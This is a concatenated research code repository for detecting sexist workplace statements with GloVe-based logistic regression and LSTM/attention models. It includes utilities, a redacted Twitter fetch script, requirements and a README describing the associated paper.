if j < max_len and w in word_to_index:
X_indices[i, j] = word_to_index[w]
j = j + 1
return X_indices
def pretrained_embedding_layer(word_to_vec_map, word_to_index):
"""
Creates a Keras Embedding() layer and loads in pre-trained GloVe 50-dimensional vectors.
Arguments:
word_to_vec_map -- dictionary mapping words to their GloVe vector representation.
word_to_index -- dictionary mapping from words to their indices in the vocabulary (400,001 words)
Returns:
embedding_layer -- pretrained layer Keras instance
"""
vocab_len = len(word_to_index) + 2 # adding 1 to fit Keras embedding (requirement)
emb_dim = word_to_vec_map["cucumber"].shape[0] # define dimensionality of your GloVe word vectors (= 50)
print(emb_dim)
# Initialize the embedding matrix as a numpy array of zeros of shape (vocab_len, dimensions of word vectors = emb_dim)
emb_matrix = np.zeros((vocab_len, emb_dim))
# Set each row "index" of the embedding matrix to be the word vector representation of the "index"th word of the vocabulary
for word, index in word_to_index.items():
emb_matrix[index, :] = word_to_vec_map[word]
# Define Keras embedding layer with the correct output/input sizes, make it trainable. Use Embedding(...). Make sure to set trainable=False.
embedding_layer = Embedding(vocab_len, emb_dim, trainable=False)
### END CODE HERE ###
# Build the embedding layer, it is required before setting the weights of the embedding layer. Do not modify the "None".
embedding_layer.build((None,))
# Set the weights of the embedding layer to the embedding matrix. Your layer is now pretrained.
embedding_layer.set_weights([emb_matrix])
return embedding_layer
def modelV1(X, Y, word_to_vec_map, learning_rate=0.01, num_iterations=500):
"""
Model to train word vector representations in numpy.
Arguments:
X -- input data, numpy array of sentences as strings, of shape (m, 1)
Y -- labels, numpy array of integers between 0 and 7, numpy-array of shape (m, 1)
word_to_vec_map -- dictionary mapping every word in a vocabulary into its 50-dimensional vector representation
learning_rate -- learning_rate for the stochastic gradient descent algorithm
num_iterations -- number of iterations
Returns:
pred -- vector of predictions, numpy-array of shape (m, 1)
W -- weight matrix of the softmax layer, of shape (n_y, n_h)
b -- bias of the softmax layer, of shape (n_y,)
"""
np.random.seed(1)
# Define number of training examples
r = Y.shape[0] # number of training examples
n_y = 5 # number of classes
n_h = 50 # dimensions of the GloVe vectors
# Initialize parameters using Xavier initialization
W = np.random.randn(n_y, n_h) / np.sqrt(n_h)
b = np.zeros((n_y,))
# Convert Y to Y_onehot with n_y classes
Y_oh = convert_to_one_hot(Y, C=n_y)
# Optimization loop
for t in range(num_iterations): # Loop over the number of iterations
for i in range(r): # Loop over the training examples
avg = sentence_to_avg(X[i], word_to_vec_map)
z = np.dot(W, avg) + b
a = softmax_SD(z)
cost = -np.dot(Y_oh[i], np.log(a))
# Compute gradients
dz = a - Y_oh[i]
dW = np.dot(dz.reshape(n_y, 1), avg.reshape(1, n_h))
db = dz
# Update parameters with Stochastic Gradient Descent
W = W - learning_rate * dW
b = b - learning_rate * db
if t % 100 == 0:
print("Epoch: " + str(t) + " --- cost = " + str(cost))
pred_ret = predict(X, Y, W, b, word_to_vec_map)
return pred_ret, W, b
def modelV2(input_shape, word_to_vec_map, word_to_index, lay1_num=128, lay2_num=128):
"""
Function creating the Emojify-v2 model's graph.
Arguments:
input_shape -- shape of the input, usually (max_len,)
word_to_vec_map -- dictionary mapping every word in a vocabulary into its 50-dimensional vector representation
word_to_index -- dictionary mapping from words to their indices in the vocabulary (400,001 words)
Returns:
model -- a model instance in Keras
"""
sentence_indices = Input(shape=input_shape, dtype='int32')
embedding_layer = pretrained_embedding_layer(word_to_vec_map, word_to_index)
embeddings = embedding_layer(sentence_indices)
X = LSTM(lay1_num, return_sequences=True)(embeddings)
X = Dropout(0.5)(X)
X = LSTM(lay2_num, return_sequences=False)(X)
X = Dropout(0.5)(X)
X = Dense(2, activation='softmax')(X)
X = Activation('softmax')(X)
model = Model(inputs=sentence_indices, outputs=X)
return model
def modelV3(input_shape, word_to_vec_map, word_to_index, lay1_num=128, lay2_num=128):
sentence_indices = Input(shape=input_shape, dtype='int32')
embedding_layer = pretrained_embedding_layer(word_to_vec_map, word_to_index)
embeddings = embedding_layer(sentence_indices)
X = Bidirectional(LSTM(lay1_num, return_sequences=True), input_shape=input_shape)(embeddings)
X = Dropout(0.5)(X)
X = Bidirectional(LSTM(lay2_num, return_sequences=False), input_shape=input_shape)(X)
X = Dropout(0.5)(X)
X = Dense(2, activation='softmax')(X)
X = Activation('softmax')(X)
model = Model(inputs=sentence_indices, outputs=X)
return model
def modelV4(input_shape, word_to_vec_map, word_to_index, lay1_num=128, lay2_num=128, n_features=50,
isRandom=False, isAttention=True):
sentence_indices = Input(shape=input_shape, dtype='int32')
embeddings = None
if isRandom:
vocab_len, emb_dim = len(word_to_index) + 1, word_to_vec_map["cucumber"].shape[0]
embedding_layer = Embedding(len(word_to_index) + 1, 50,
input_length=maxLen) # embedding_layer(sentence_indices)
emb_matrix = np.zeros((vocab_len, emb_dim))
for word, index in word_to_index.items():
emb_matrix[index, :] = np.random.rand(1, emb_dim)
embedding_layer.build((None,))
embedding_layer.set_weights([emb_matrix])
embeddings = embedding_layer(sentence_indices)
else:
embedding_layer = pretrained_embedding_layer(word_to_vec_map, word_to_index)
embeddings = embedding_layer(sentence_indices)
X = Bidirectional(LSTM(lay1_num, return_sequences=True), input_shape=input_shape)(embeddings)
X = Dropout(0.5)(X)
if isAttention:
attention = Dense(1, activation='tanh')(X)
attention = Flatten()(attention)
attention = Activation('softmax')(attention)
attention = RepeatVector(lay1_num * 2)(attention)
attention = Permute([2, 1])(attention)
sent_representation = merge.Multiply()([X, attention])
sent_representation = Lambda(lambda xin: K.sum(xin, axis=1))(sent_representation)
X = Dropout(0.5)(sent_representation)
else:
X = Bidirectional(LSTM(lay2_num, return_sequences=False), input_shape=input_shape)(X)
X = Dropout(0.5)(X)
pass
X = Dense(2, activation='softmax')(X)
X = Activation('softmax')(X)
model = Model(inputs=sentence_indices, outputs=X)
return model
tests_dict, wrongs_dict = {}, {}
num_it = 10
n_models = 4
acc_sum_v = [0] * (n_models + 1)
fp_sum_v, fn_sum_v = [0] * (n_models + 1), [0] * (n_models + 1)
tp_sum_v, tn_sum_v = [0] * (n_models + 1), [0] * (n_models + 1)
num_0s_sum, num_1s_sum = 0, 0
runModels = [None,
True, # run ModelV1?
True, # run ModelV2?
True, # run ModelV3?
True,] # run ModelV4?
gb_accs = [0, 0, 0]
if __name__ == "__main__":
for it in range(num_it):
print("\nIteration #" + str(it + 1))
X, y = read_csv(sexist_dataset_fn)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=np.random)
maxLen = len(max(X, key=len).split()) + 1
y_oh_train = convert_to_one_hot(y_train, C=2)
y_oh_test = convert_to_one_hot(y_test, C=2)
num_1s = sum(y_test)
num_0s = y_test.shape[0] - num_1s
num_0s_sum += num_0s
num_1s_sum += num_1s
# V1 model
if runModels[1]:
pred, W, b = modelV1(X_train, y_train, word_to_vec_map)
pred_train, _ = predict(X_train, y_train, W, b, word_to_vec_map)
predV1, acc1 = predict(X_test, y_test, W, b, word_to_vec_map)
v1_tp, v1_tn, v1_fp, v1_fn = 0, 0, 0, 0
for k in range(len(X_test)):
num = predV1[k]
if num != y_test[k]:
if int(num) == 1:
v1_fp += 1
elif int(num) == 0:
v1_fn += 1
else:
if int(num) == 1:
v1_tp += 1
elif int(num) == 0:
v1_tn += 1
tp_sum_v[1] += v1_tp
tn_sum_v[1] += v1_tn
fp_sum_v[1] += v1_fp
fn_sum_v[1] += v1_fn
acc_sum_v[1] += acc1
print("0 misclass: " + str(v1_fp / (v1_tn + v1_fp)))
print("1 misclass: " + str(v1_fn / (v1_tp + v1_fn)))
print("Overall accuracy: " + str(acc1))
gc.collect()
# V2 model
if runModels[2]:
model_v2 = modelV2((maxLen,), word_to_vec_map, word_to_index, lay1_num=128, lay2_num=128)
model_v2.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
X_train_indices = sentences_to_indices(X_train, word_to_index, maxLen)
y_train_oh = convert_to_one_hot(y_train, C=2)
model_v2.fit(X_train_indices, y_train_oh, epochs=30, batch_size=32, shuffle=True)
X_test_indices = sentences_to_indices(X_test, word_to_index, max_len=maxLen)
y_test_oh = convert_to_one_hot(y_test, C=2)
loss, acc2 = model_v2.evaluate(X_test_indices, y_test_oh)
predV2 = model_v2.predict(X_test_indices)
v2_tp, v2_tn, v2_fp, v2_fn = 0, 0, 0, 0
for k in range(len(X_test)):
num = np.argmax(predV2[k])
if num != y_test[k]:
if int(num) == 1:
v2_fp += 1
elif int(num) == 0:
v2_fn += 1
else:
if int(num) == 1:
v2_tp += 1
elif int(num) == 0:
v2_tn += 1
tp_sum_v[2] += v2_tp
tn_sum_v[2] += v2_tn
fp_sum_v[2] += v2_fp
fn_sum_v[2] += v2_fn
print("0 misclass: " + str(v2_fp / (v2_tn + v2_fp)))
print("1 misclass: " + str(v2_fn / (v2_tp + v2_fn)))
print("Overall accuracy: " + str(acc2))
acc_sum_v[2] += acc2
gc.collect()
plot_model(model_v2, to_file='model_v2.png')
# V3 model
if runModels[3]:
v3_tp, v3_tn, v3_fp, v3_fn = 0, 0, 0, 0
model_v3 = modelV3((maxLen,), word_to_vec_map, word_to_index, lay1_num=128, lay2_num=128)
model_v3.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
X_train_indices = sentences_to_indices(X_train, word_to_index, maxLen)
y_train_oh = convert_to_one_hot(y_train, C=2)
model_v3.fit(X_train_indices, y_train_oh, epochs=25, batch_size=32, shuffle=True)
X_test_indices = sentences_to_indices(X_test, word_to_index, max_len=maxLen)
y_test_oh = convert_to_one_hot(y_test, C=2)
loss, acc3 = model_v3.evaluate(X_test_indices, y_test_oh)
predV2 = model_v3.predict(X_test_indices)
for k in range(len(X_test)):
num = np.argmax(predV2[k])
if num != y_test[k]:
if int(num) == 1:
v3_fp += 1
elif int(num) == 0:
v3_fn += 1
else:
if int(num) == 1:
v3_tp += 1
elif int(num) == 0:
v3_tn += 1
tp_sum_v[3] += v3_tp
tn_sum_v[3] += v3_tn
fp_sum_v[3] += v3_fp
fn_sum_v[3] += v3_fn
acc_sum_v[3] += acc3
print("0 misclass: " + str(v3_fp / (v3_tn + v3_fp)))
print("1 misclass: " + str(v3_fn / (v3_tp + v3_fn)))
print("Overall accuracy: " + str(acc3))
gc.collect()
plot_model(model_v3, to_file='model_v3.png')
# V4 Model
if runModels[4]:
v4_tp, v4_tn, v4_fp, v4_fn = 0, 0, 0, 0
STAMP = 'simple_lstm_glove_vectors'
early_stopping = EarlyStopping(monitor='val_loss', patience=5)
bst_model_path = STAMP + '.h5'
model_checkpoint = ModelCheckpoint(bst_model_path, save_best_only=True, save_weights_only=True)
model_v4 = modelV4((maxLen,), word_to_vec_map, word_to_index, lay1_num=128, lay2_num=128, n_features=maxLen,
isRandom=False, isAttention=True)
model_v4.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
X_train_indices = sentences_to_indices(X_train, word_to_index, maxLen)
y_train_oh = convert_to_one_hot(y_train, C=2)
model_v4.fit(X_train_indices, y_train_oh, epochs=30, batch_size=32, shuffle=True,
callbacks=[early_stopping, model_checkpoint])
X_test_indices = sentences_to_indices(X_test, word_to_index, max_len=maxLen)
y_test_oh = convert_to_one_hot(y_test, C=2)
loss, acc4 = model_v4.evaluate(X_test_indices, y_test_oh)
predV2 = model_v4.predict(X_test_indices)
for k in range(len(X_test)):
num = np.argmax(predV2[k])
if num != y_test[k]:
if X_test[k] in wrongs_dict:
wrongs_dict[X_test[k]] += 1
else:
wrongs_dict[X_test[k]] = 1
if int(num) == 1:
v4_fp += 1
elif int(num) == 0:
v4_fn += 1
else:
if int(num) == 1:
v4_tp += 1
elif int(num) == 0:
v4_tn += 1
tp_sum_v[4] += v4_tp
tn_sum_v[4] += v4_tn
fp_sum_v[4] += v4_fp
fn_sum_v[4] += v4_fn
acc_sum_v[4] += acc4
print("0 misclass: " + str(v4_fp / (v4_tn + v4_fp)))
print("1 misclass: " + str(v4_fn / (v4_tp + v4_fn)))
print("Overall accuracy: " + str(acc4))
print("================================================================================")
acc_avg_v = np.divide(acc_sum_v, float(it + 1))
v_num = len(acc_sum_v)
wrongs_dict_worst = dict((k, v) for k, v in wrongs_dict.items() if v >= (int((it + 1) / 2) + 1))
pp.pprint(wrongs_dict_worst)
for v in range(1, v_num):
if not (tp_sum_v[v] == 0 or fp_sum_v == 0 or fn_sum_v == 0):
p = tp_sum_v[v] / (tp_sum_v[v] + fp_sum_v[v])
r = tp_sum_v[v] / (tp_sum_v[v] + fn_sum_v[v])
f1 = (2 * p * r) / (p + r)
print("=============== MODEL V" + str(v) + " =====================")
print("V" + str(v) + " Accuracy: " + str(acc_avg_v[v]))
print("Total Number of 0 labels: " + str(num_0s_sum) +
"\tNumber Mislabeled: " + str(fp_sum_v[v]) +
"\tMislabel Rate: " + str(fp_sum_v[v] / num_0s_sum))
print("Total Number of 1 labels: " + str(num_1s_sum) +
"\tNumber Mislabeled: " + str(fn_sum_v[v]) +
"\tMislabel Rate: " + str(fn_sum_v[v] / num_1s_sum))
print("Precision: " + str(p))
print("Recall: " + str(r))
print("F1 Score: " + str(f1))
<file_sep>/SD_utils.py
import csv
import numpy as np
import emoji
import pandas as pd
import re
import contractions
#from spellchecker import SpellChecker
import matplotlib.pyplot as plt
#spell = SpellChecker()
def read_glove_vecs(glove_file):
with open(glove_file, encoding="utf8") as f:
words = set()
word_to_vec_map = {}
for line in f:
line = line.strip().split()
curr_word = line[0]
words.add(curr_word)
word_to_vec_map[curr_word] = np.array(line[1:], dtype=np.float64)
i = 1
words_to_index = {}
index_to_words = {}
for w in sorted(words):
words_to_index[w] = i
index_to_words[i] = w
i = i + 1
return words_to_index, index_to_words, word_to_vec_map
def softmax_SD(x):
"""Compute softmax values for each sets of scores in x."""
e_x = np.exp(x - np.max(x))
return e_x / e_x.sum()
def remove_special_characters(text, remove_digits=False):
pattern = r'[^a-zA-Z0-9\s]' if not remove_digits else r'[^a-zA-Z\s]'
text = re.sub(pattern, '', text)
return text
def read_csv(filename = 'data/SD_dataset_FINAL.csv'):
phrase = []
emoji = []
with open (filename) as csvDataFile:
csvReader = csv.reader(csvDataFile)
special_char_pattern = re.compile(r'([{.(-)!}])')
for row in csvReader:
num_col = len(row)
s = ""
for c_n in range(num_col - 1):
s += row[c_n]
s = re.sub(',', ':', s)
s = contractions.fix(s)
s = special_char_pattern.sub(" \\1 ", s)
s = remove_special_characters(s, remove_digits=True)
phrase.append(s)
emoji.append(row[num_col - 1])
X = np.asarray(phrase)
Y = np.asarray(emoji, dtype=int)
return X, Y
def convert_to_one_hot(Y, C):
Y = np.eye(C)[Y.reshape(-1)]
return Y
label_dictionary = {"0": "Neutral/Not Extremely Sexist",
"1": "Sexist"}
def label_to_name(label):
"""
Converts a label (int or string) into the corresponding emoji code (string) ready to be printed
"""
return emoji.emojize(label_dictionary[str(label)], use_aliases=True)
def print_predictions(X, pred):
print()
for i in range(X.shape[0]):
print(X[i], label_to_name(int(pred[i])))
def plot_confusion_matrix(y_actu, y_pred, title='Confusion matrix', cmap=plt.cm.gray_r):
df_confusion = pd.crosstab(y_actu, y_pred.reshape(y_pred.shape[0],), rownames=['Actual'], colnames=['Predicted'], margins=True)
df_conf_norm = df_confusion / df_confusion.sum(axis=1)
plt.matshow(df_confusion, cmap=cmap) # imshow
#plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(df_confusion.columns))
plt.xticks(tick_marks, df_confusion.columns, rotation=45)
plt.yticks(tick_marks, df_confusion.index)
#plt.tight_layout()
plt.ylabel(df_confusion.index.name)
plt.xlabel(df_confusion.columns.name)
def predict(X, Y, W, b, word_to_vec_map):
"""
Given X (sentences) and Y (emoji indices), predict emojis and compute the accuracy of your model over the given set.
Arguments:
X -- input data containing sentences, numpy array of shape (m, None)
Y -- labels, containing index of the label emoji, numpy array of shape (m, 1)
Returns:
pred -- numpy array of shape (m, 1) with your predictions
"""
m = X.shape[0]
pred = np.zeros((m, 1))
for j in range(m): # Loop over training examples
# Split jth test example (sentence) into list of lower case words
words = X[j].lower().split()
# Average words' vectors
avg = np.zeros((50,))
for w in words:
if w in word_to_vec_map:
avg += word_to_vec_map[w]
avg = avg/len(words)
# Forward propagation
Z = np.dot(W, avg) + b
A = softmax_SD(Z)
pred[j] = np.argmax(A)
acc = np.mean((pred[:] == Y.reshape(Y.shape[0],1)[:]))
print("Accuracy: " + str(acc))
return pred, acc<file_sep>/twitterSexistExtract.py
import collections
import math
import sys
import twitter
import pandas as pd
import time
c_k = '<KEY>'
c_sk = '<KEY>'
a_t_k = '816115737177<KEY>'
a_t_sk = '<KEY>'
raw_data_loc = 'WH_dataset_withText_save'
api = twitter.Api(consumer_key=c_k,
consumer_secret=c_sk,
access_token_key=a_t_k,
access_token_secret=a_t_sk,
sleep_on_rate_limit=True)
tID_raw = pd.read_csv(raw_data_loc)
tID_text = tID_raw.values
print(tID_text)
tID_text_toReplace = tID_text.copy()
i = 0
for ind, id, label in tID_text:
if label != 'racism' and label != 0 and label != 1:
print(id)
if str(id) != 'nan' and '#' not in id and id != 'NA' and id != 'NAr' and ' ' not in id:
id = int(id)
tweet = ''
try:
tweet = api.GetStatus(id).text
except twitter.error.TwitterError as e:
print(str(e))
tweet = 'error in fetching'
tID_text_toReplace[i, 1] = tweet
tID_text_toReplace[i, 2] = 1 if label == 'sexism' else 0
pd.DataFrame(tID_text_toReplace).to_csv('WH_dataset_withText')
elif label != 0 or label != 1:
tID_text_toReplace[i, 2] = 'NA'
i += 1
# time.sleep(0.5)
print(i)
print("Test status: " + str(api.GetStatus('572342978255048705').text))<file_sep>/requirements.txt
absl-py==0.3.0
alabaster==0.7.10
anaconda-client==1.6.14
anaconda-navigator==1.8.7
anaconda-project==0.8.2
appnope==0.1.0
asn1crypto==0.24.0
astor==0.7.1
astroid==1.6.3
astropy==3.0.2
attrs==18.1.0
audioread==2.1.6
Babel==2.5.3
backcall==0.1.0
backports.shutil-get-terminal-size==1.0.0
beautifulsoup4==4.6.0
bert-embedding==1.0.1
bitarray==0.8.1
bkcharts==0.2
blaze==0.11.3
bleach==3.0.2
bokeh==0.12.16
boto==2.48.0
boto3==1.9.157
botocore==1.12.157
Bottleneck==1.2.1
cachetools==3.1.1
certifi==2019.11.28
cffi==1.11.5
chardet==3.0.4
Click==7.0
cloudpickle==0.5.3
clyent==1.2.2
colorama==0.3.9
comtypes==1.1.4
conda==4.8.1
conda-build==3.10.5
conda-package-handling==1.3.11
conda-verify==2.0.0
contextlib2==0.5.5
contractions==0.0.18
cryptography==2.7
cycler==0.10.0
Cython==0.28.2
cytoolz==0.9.0.1
dask==0.17.5
datashape==0.5.4
decorator==4.3.0
defusedxml==0.5.0
distributed==1.21.8
distro==1.4.0
docopt==0.6.2
docutils==0.14
emoji==0.5.2
entrypoints==0.2.3
et-xmlfile==1.0.1
Faker==1.0.5
fastcache==1.0.2
ffmpeg==1.4
filelock==3.0.4
Flask==1.0.2
Flask-Cors==3.0.4
future==0.16.0
gast==0.2.0
gcloud==0.18.3
gensim==3.7.3
gevent==1.3.0
glob2==0.6
gluonnlp==0.6.0
googleapis-common-protos==1.6.0
graphviz==0.8.4
greenlet==0.4.13
grpcio==1.12.1
h5py==2.7.1
heapdict==1.0.0
html5lib==1.0.1
httplib2==0.14.0
idna==2.6
imageio==2.3.0
imagesize==1.0.0
inexactsearch==1.0.2
intervaltree==2.1.0
ipykernel==4.8.2
ipython==6.4.0
ipython-genutils==0.2.0
ipywidgets==7.2.1
isort==4.3.4
itsdangerous==0.24
jdcal==1.4
jedi==0.12.0
Jinja2==2.10
jmespath==0.9.4
joblib==0.13.2
JPype1==0.7.0
jsonschema==2.6.0
jupyter==1.0.0
jupyter-client==5.2.3
jupyter-console==5.2.0
jupyter-core==4.4.0
jupyterlab==0.32.1
jupyterlab-launcher==0.10.5
Keras==2.2.4
Keras-Applications==1.0.7
Keras-Preprocessing==1.0.9
kiwisolver==1.0.1
lazy-object-proxy==1.3.1
libarchive-c==2.8
librosa==0.6.2
llvmlite==0.23.1
locket==0.2.0
lxml==4.2.1
magenta==0.3.12
Markdown==2.6.11
MarkupSafe==1.0
matplotlib==2.2.2
mccabe==0.6.1
menuinst==1.4.14
mido==1.2.6
mir-eval==0.4
mistune==0.8.3
mkl-fft==1.0.0
mkl-random==1.0.1
mkl-service==2.0.2
more-itertools==4.1.0
mpmath==1.0.0
msgpack-python==0.5.6
multipledispatch==0.5.0
music21==5.3.0
mxnet==1.4.0
navigator-updater==0.2.1
nbconvert==5.3.1
nbformat==4.4.0
networkx==2.1
nltk==3.3
nose==1.3.7
notebook==5.5.0
numba==0.38.0
numexpr==2.6.8
numpy==1.14.6
numpydoc==0.8.0
oauth2client==4.1.3
oauthlib==3.0.1
odo==0.5.1
olefile==0.45.1
openpyxl==2.5.3
packaging==17.1
pandas==0.23.0
pandoc==1.0.2
pandocfilters==1.4.2
parso==0.2.0
partd==0.3.8
path.py==11.0.1
pathlib2==2.3.2
patsy==0.5.0
pep8==1.7.1
pickleshare==0.7.4
Pillow==5.1.0
pkginfo==1.4.2
pluggy==0.6.0
ply==3.11
pretty-midi==0.2.8
prompt-toolkit==1.0.15
protobuf==3.6.0
psutil==5.4.5
py==1.5.3
pyasn1==0.4.7
pyasn1-modules==0.2.6
pycodestyle==2.4.0
pycosat==0.6.3
pycparser==2.18
pycrypto==2.6.1
pycurl==7.43.0.3
pydot==1.4.1
pyflakes==1.6.0
Pygments==2.2.0
pylint==1.8.4
pyodbc==4.0.23
pyOpenSSL==18.0.0
pyparsing==2.2.0
PySocks==1.6.8
pytest==3.5.1
pytest-arraydiff==0.2
pytest-astropy==0.3.0
pytest-doctestplus==0.1.3
pytest-openfiles==0.3.0
pytest-remotedata==0.2.1
python-dateutil==2.7.3
python-rtmidi===1.1.1.dev0.dev
python-twitter==3.5
pytz==2018.4
PyWavelets==0.5.2
pywin32==223
pywinpty==0.5.1
PyYAML==3.12
pyzmq==17.0.0
QtAwesome==0.4.4
qtconsole==4.3.1
QtPy==1.4.1
requests==2.18.4
requests-oauthlib==1.2.0
resampy==0.2.1
rope==0.10.7
rsa==4.0
ruamel-yaml==0.15.35
s3transfer==0.2.0
scikit-image==0.13.1
scikit-learn==0.21.2
scipy==1.1.0
seaborn==0.8.1
Send2Trash==1.5.0
silpa-common==0.3
simplegeneric==0.8.1
singledispatch==3.4.0.3
six==1.12.0
smart-open==1.8.3
snowballstemmer==1.2.1
sortedcollections==0.6.1
sortedcontainers==1.5.10
soundex==1.1.3
spark-parser==1.8.7
spellchecker==0.4
Sphinx==1.7.4
sphinxcontrib-websupport==1.0.1
spyder==3.2.8
SQLAlchemy==1.2.7
statsmodels==0.9.0
sympy==1.1.1
tables==3.4.3
tabula-py==1.3.1
tblib==1.3.2
tensorboard==1.9.0
tensorflow==1.9.0
termcolor==1.1.0
terminado==0.8.1
testpath==0.3.1
text-unidecode==1.2
toolz==0.9.0
torch==1.4.0
torchvision==0.5.0
tornado==5.0.2
tqdm==4.31.1
traitlets==4.3.2
typing==3.6.6
uncompyle6==3.2.3
unicodecsv==0.14.1
urllib3==1.22
wcwidth==0.1.7
webencodings==0.5.1
Werkzeug==0.14.1
widgetsnbextension==3.2.1
wikipedia==1.4.0
win-inet-pton==1.0.1
win-unicode-console==0.5
wincertstore==0.2
wrapt==1.10.11
xdis==3.8.7
xgboost==0.90
xlrd==1.1.0
XlsxWriter==1.0.4
xlwings==0.11.8
xlwt==1.3.0
zict==0.1.3
<file_sep>/README.md
# Automatic Detection of Sexist Statements Commonly Used at the Workplace
Repository for "Automatic Detection of Sexist Statements Commonly Used at the Workplace" by <NAME> & <NAME>. The associated paper was accepted to the PAKDD Workshop on Learning Data Representation for Clustering (LDRC 2020).
Associated Paper: https://hal.archives-ouvertes.fr/hal-02573576/
## Abstract
> Detecting hate speech in the workplace is a unique classification task, as the underlying social context implies a subtler version of conventional hate speech. Applications regarding a state-of-the-art workplace sexism detection model include aids for Human Resources departments, AI chatbots and sentiment analysis. Most existing hate speech detection methods, although robust and accurate, focus on hate speech found on social media, specifically Twitter. The context of social media is much more anonymous than the workplace, therefore it tends to lend itself to more aggressive and “hostile” versions of sexism. Therefore, datasets with large amounts of “hostile” sexism have a slightly easier detection task since “hostile” sexist statements can hinge on a couple words that, regardless of context, tip the model off that a statement is sexist. In this paper we present a dataset of sexist statements that are more likely to be said in the workplace as well as a deep learning model that can achieve state-of-the art results. Previous research has created state-of-the-art models to distinguish “hostile” and “benevolent” sexism based simply on aggregated Twitter data. Our deep learning methods, initialized with GloVe or random word embeddings, use LSTMs with attention mechanisms to outperform those models on a more diverse, filtered dataset that is more targeted towards workplace sexism, leading to an F1 score of 0.88.
## Getting Started
### Environment
After cloning the repository, access the resulting folder and run ```pip install -r requirements.txt```. It is recommended to install all of the packages in ```requirements.txt```. However, some of these packages may be superfluous, as most of this paper's development occurred in PyCharm.
### Downloading Dependent Data
#### GloVe Word Embeddings
Download a GloVe dataset from https://nlp.stanford.edu/projects/glove/. For both memory considerations and replication of this research, download the 6 billion token, 50D word vectors http://nlp.stanford.edu/data/glove.6B.zip. 50 dimensions were chosen over larger embedding dimensions in order to prevent overfitting/memorization during training on such a small dataset.
A similarly trained gender balanced GloVe dataset (GN-GloVe) can be downloaded here: https://drive.google.com/file/d/1v82WF43w-lE-vpZd0JC1K8WYZQkTy_ii/view
After downloading the dataset, make sure to either name your embedding text file ```vectors.txt``` after placing it in the ```data``` folder, or edit ```embedding_fn``` in ```SexisteDetectionMain.py``` (line 33) so it points to the correct filepath.
#### Sexist Workplace Statements Dataset
The dataset we used for training is provided in ```data/SD_dataset_FINAL.csv```. It is also present on Kaggle: https://www.kaggle.com/dgrosz/sexist-workplace-statements. If you would like to update the dataset and reupload, either place it in the ```data``` folder and rename it to ```SD_dataset_FINAL.csv``` or edit the ```sexist_dataset_fn``` variable on line 32 of ```SexisteDetectionMain.py```.
### Running the Models
After all the embeddings and sexist workplace statements datasets are properly loaded and referenced, run ```SexisteDetectionMain.py```. There are 8 versions of the model that we have coded, each with their own architecture:
- ModelV1: word embeddings are concatenated per phrase, averaged and put through logistic regression
- ModelV2: word embeddings are sequentially pushed through a Vanilla Unidirectional LSTM architecture, specifically ```Embedding->LSTM->Dropout->LSTM->FullyConnected->Softmax```
- ModelV3: word embeddings (you can toggle between random embeddings and loaded GloVe embeddings in the function call) are sequentially pushed through a Bidirectional LSTM architecture, specifically ```Embedding->BiLSTM->Dropout->BiLSTM->FullyConnected->Softmax```
- ModelV4: embeddings (you can toggle between random embeddings and loaded GloVe embeddings in the function call) are pushed through a Bidirectional LSTM architecture with attention, specifically ```Embedding->BiLSTM->Dropout->BiLSTM->Attention->FullyConnected->Softmax```
If you don't change the initial code and run ```SexisteDetectionMain.py```, all of these listed models will run sequentially, performing 10 iterations of training and testing (respective training/testing sets are chosen at random for each iteration). You can edit number of iterations on line 335, and you can edit the list of which models to run in the runModels boolean list (lines 342-346).
For any questions, please email <NAME> at _dgrosz 'at' stanford 'dot' edu_.
<file_sep>/data_handler.py
import json
import pdb
import codecs
import pdb
import pandas as pd
def get_data():
statements = []
X, y = pd.read_csv('data/SD_dataset_FINAL.csv')
#pdb.set_trace()
return X
if __name__=="__main__":
tweets = get_data()
males, females = {}, {}
with open('./tweet_data/males.txt') as f:
males = set([w.strip() for w in f.readlines()])
with open('./tweet_data/females.txt') as f:
females = set([w.strip() for w in f.readlines()])
males_c, females_c, not_found = 0, 0, 0
for t in tweets:
if t['name'] in males:
males_c += 1
elif t['name'] in females:
females_c += 1
else:
not_found += 1
pdb.set_trace()
<file_sep>/lstm.py
from SexisteDetectionMain import pretrained_embedding_layer
from data_handler import get_data
import argparse
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Embedding, Input, LSTM, Bidirectional, RepeatVector, Permute, merge, Lambda
from keras.models import Sequential, Model
from keras.layers import Activation, Dense, Dropout, Embedding, Flatten, Input, Convolution1D, MaxPooling1D, \
GlobalMaxPooling1D
import keras.backend as K
import numpy as np
import pandas as pd
import pdb, json
from sklearn.metrics import make_scorer, f1_score, accuracy_score, recall_score, precision_score, classification_report, \
precision_recall_fscore_support
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier
from sklearn.model_selection import train_test_split
from gensim.parsing.preprocessing import STOPWORDS
from sklearn.model_selection import KFold
from keras.utils import np_utils
import codecs
from sklearn.utils import shuffle
import operator
import gensim, sklearn
from string import punctuation
from collections import defaultdict
from batch_gen import batch_gen
import sys
from SD_utils import *
from nltk import tokenize as tokenize_nltk
from my_tokenizer import glove_tokenize
from SD_utils import read_glove_vecs
EMBEDDING_DIM = None
GLOVE_MODEL_FILE = None
SEED = 42
NO_OF_FOLDS = 10
CLASS_WEIGHT = None
LOSS_FUN = None
OPTIMIZER = None
KERNEL = None
TOKENIZER = None
MAX_SEQUENCE_LENGTH = None
INITIALIZE_WEIGHTS_WITH = None
LEARN_EMBEDDINGS = None
EPOCHS = 10
BATCH_SIZE = 512
SCALE_LOSS_FUN = None
vocab, reverse_vocab = {}, {}
freq = defaultdict(int)
tweets = {}
word2vec_model = None
def sentences_to_indices(X_s, word_to_index, max_len):
"""
Converts an array of sentences (strings) into an array of indices corresponding to words in the sentences.
The output shape should be such that it can be given to `Embedding()` (described in Figure 4).
Arguments:
X -- array of sentences (strings), of shape (m, 1)
word_to_index -- a dictionary containing the each word mapped to its index
max_len -- maximum number of words in a sentence. You can assume every sentence in X is no longer than this.
Returns:
X_indices -- array of indices corresponding to words in the sentences from X, of shape (m, max_len)
"""
m = len(X_s) # number of training examples
print(m)
### START CODE HERE ###
# Initialize X_indices as a numpy matrix of zeros and the correct shape (≈ 1 line)
X_indices = np.zeros((m, max_len)) # If there is more than one dimension use ()
for i in range(m): # loop over training examples
# Convert the ith training sentence in lower case and split is into words. You should get a list of words.
